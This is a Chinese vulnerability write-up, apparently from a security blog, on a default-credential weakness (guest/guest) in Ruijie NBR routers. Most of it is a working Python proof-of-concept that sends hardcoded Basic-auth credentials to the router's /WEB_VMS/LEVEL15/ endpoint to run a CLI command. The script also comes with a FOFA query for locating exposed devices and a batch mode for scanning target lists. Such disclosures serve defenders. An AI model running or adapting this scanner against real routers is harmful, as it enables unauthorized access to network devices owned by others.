锐捷NBR路由器存在弱口令漏洞

简介: 锐捷NBR路由器存在弱口令漏洞

漏洞简介

锐捷网络股份有限公司是一家数据通信解决方案提供商。
锐捷网络股份有限公司NBR路由器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。

漏洞影响

NBR路由器

漏洞复现

百度上查询到NBR路由器的默认账号密码为guest/guest

91179e7b11ccd65c958c87ed98dd96e7.png

在NBR后台管理界面使用默认账号密码成功登录后台

feefba9d878be6dff46ec5d753fd6c47.png

poc

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
import sys
import argparse
def lemonlove7():
    print('FOFA:title="锐捷网络--NBR路由器--登录界面"')
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file xxx.txt')
    print('lemonlove7')
if len(sys.argv) == 1:
    lemonlove7()
    sys.exit()
par = argparse.ArgumentParser(description='lemonlove7 help')
par.add_argument('-u','--url' ,help='输入url',default='')
par.add_argument('-f','--file',help='输入文件',default='')
a = par.parse_args()
url =a.url
file =a.file
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'text/plain;charset=UTF-8',
    'Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest',
    'Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q='
}
data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.'
if url != '':
    url = url
    url2 =url
    try:
        url1 =url+'/WEB_VMS/LEVEL15/'
        r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10)
        #print(r.text)
        if r.status_code == 200 and 'WebCLI' in r.text:
            print(url2+'NBR路由器存在弱口令:guest/guest')
        else:
            print(url2+'NBR路由器不存在弱口令')
    except Exception as e:
        print(url2+'异常')
if file != '':
    p = open(file,'r+')
    for i in p.readlines():
        url = i.strip()
        if url.startswith('http://') != 1 and url.startswith('https://') != 1:
            url = 'http://'+url
        url=url
        url1=url
        #print(url)
        try:
            url = url +'/WEB_VMS/LEVEL15/'
            r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10)
            if r.status_code == 200 and 'WebCLI' in r.text:
                print(url1+'NBR路由器存在弱口令:guest/guest')
            else:
                print(url1+'NBR路由器不存在弱口令')
        except Exception as e:
            print(url1+'异常')

运行效果如下:

单个检测:

640.png

批量检测:

640.png

相关文章
|
安全 数据安全/隐私保护
渗透攻击实例-后台弱口令
渗透攻击实例-后台弱口令
|
网络安全 数据安全/隐私保护 计算机视觉
《网络安全0-100》口令系统
《网络安全0-100》口令系统
145 0
|
存储 安全 Linux
别让你的服务器(vps)沦为肉鸡(ssh暴力破解),密钥验证、双向因子登录值得拥有
如果你购买了阿里云、腾讯云或者华为云等国内云服务上的服务器,默认登录都是以密码的方式,这就给潜在的渗透带来了机会,因为当你的linux服务器暴露在外网当中时,服务器就极有可能会遭到互联网上的扫描软件进行扫描,然后试图连接ssh端口进行暴力破解(穷举扫描),如果你不采取相对应的措施,迟早有一天服务器会被渗透者攻陷,这也就解释了为什么google cloud(谷歌云)和aws(亚马逊云)默认都是以秘钥的方式登录服务器。
别让你的服务器(vps)沦为肉鸡(ssh暴力破解),密钥验证、双向因子登录值得拥有
|
网络协议 网络安全 数据安全/隐私保护
vos3000常见的网络问题怎样解决
vos3000常见的网络问题怎样解决
|
安全 数据安全/隐私保护
攻击ATM机的木马出现 用户银行卡密码面临安全威胁
3.15刚过,就在广大网民还沉浸在中央电视台曝光的网银安全问题以及网络肉鸡攻击的恐怖氛围中时,3月18日,据国外消息,国外某安全研究机构称已发现针对银行 ATM(自动取款机) 的恶意软件,该恶意软件安装成功后可记录银行卡的相关信息,并可解密所截获数据和指令,并通过 ATM 的打印功能输出犯罪者想要的信息。
1179 0
|
网络安全 数据安全/隐私保护 网络虚拟化
|
数据安全/隐私保护 网络架构